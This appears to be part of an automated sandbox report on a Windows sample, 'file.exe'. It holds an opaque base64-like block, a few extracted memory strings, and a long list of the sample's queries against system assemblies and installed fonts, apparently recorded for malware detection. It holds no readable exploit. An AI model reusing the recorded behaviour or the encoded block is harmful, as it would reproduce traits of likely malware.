YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s4kA+AcPNbK6MV3HX0LSc5ymtbjTawsGRGFd2ulQpExVMmjfsHcEAnyDE6s9/TukwBiopsUBAA6V4PZM0sHF4NzVg/RhrGAPuvFXQq9gEMA1ZA8Toc7o7D6Bnz5z8s4kBsCyk2dh+/YI5Ql1g2oRl70R45AWYOpCIrHyOmTExLB+MVDS93CSkucWzaXeY0DP5Al7hNGcCPm7WdU6YLZyc
MqwaZj1RF/HiYKopVo1ap/KmxOZyAA10YTTzVoON55LbNU9qKzCFpGA5bFS1lXFYb+GJ26BO9rgqnzEqujmAAnxhsKAvzJgN/qrRqasBO2qjbfiYTSCUteopvYX52cPCAiIMPjcaCjyaS9APl/TZZjXVQd6ZDAcwLjKH7UwdHYrUTfhLM259YzFS9jjzkdsVw7SnXG/aVBu6AqxTNfh3rCwpPaxZRnkaWDCit007OnU0BV0JXUgMCxrwTl2WwFQxU/LnW/UVS0qxq8JJsmcPbrc6XK5VnbK/BnbnGz/DotlsOegmFuoYo8LmOqZDgaBhy/iy2aYdr8Lmusp/26uFlRKlPdxutXC1gAxdDbdqVd2omKChoad8tX0Sej9GwU1Jtq5eNpuONG4sea3az7wTgV0NWyPoP/OE9yx2ZG4G2M96iTcWaTL+AFYe5eM/sAbwq2vcO3FCAfoxrPvjsH0DniIfPu58il0VOhzh5F7XPCI7WuUG3huCjp72MiVzwh42IL0G8xZdVm0asB+DubEB7NDpjPN6xV5ysOu1GwtNraKnnCBTzvIxZcKEoB/DrXEFlwLsG5zEjcQjRhM6HLdpZLJkJkpUwdZpPXeAjoGRZjaPVnlHsl/4BfHxuQLsQm6gRTFE6HDmr7Nas9ZuSBy2jQrTRErMYjMni3YczoFTJm9QUDLPTXEMtuIEHRmw10jJRLIcGuKBFUlb1sX0au+TB07X6kbJPN+Ja1NBZWA8ultEsT+Vw3Ycb0Ov9VOw7Vpt7P0D0/Z3/tii9bq9U7c4+YiJ8dgn6vMmf4RsdHs7YO+2kYrJwm11wJ2VnR8ptFCEXWAbjG4KX7BgW9mhkAAE9ujGfWOHwVgAy/Xo+bLYGTr0cY1/qMGf0aR0IsYO8E3EtHDBASaMvTTgJPL9r/NgLzQwGqvVW+swT4u1w0lG46/aAu4VbCa0+scX9fKSaS/klpPiWFvRqTOds8+xGq5GA9M6WCTNFL/UoTmAcwuMDvc8yeIUtHfqZR2tNAzgjW+bvXQxXoOpdufERMOEbkN3dhxoxxQOZpK2f8Dg9LXOT27xD0xX27BAWqljVc1a5JYK4BiYNhttqLWqiXOzeODDfBomf62asjex+IwLi4Wa
Source: file.exe, 00000003.00000002.619438910.000000000B992000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: KNOWNG~1.BINKnownGameList.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
Source: file.exe, 00000003.00000002.632995633.000000000C89C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.613121105.000000000B222000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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
Source: file.exe, 00000003.00000002.619438910.000000000B992000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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
Source: file.exe, 00000003.00000002.603157570.000000000AACA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UNARCH~1.LOGunarchiver.exe.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
Source: file.exe, 00000003.00000002.662735362.000000000E566000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_0040351E GetProcessHeap,RtlFreeHeap,3_2_0040351E
Source: C:\Users\user\Desktop\file.exe	Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
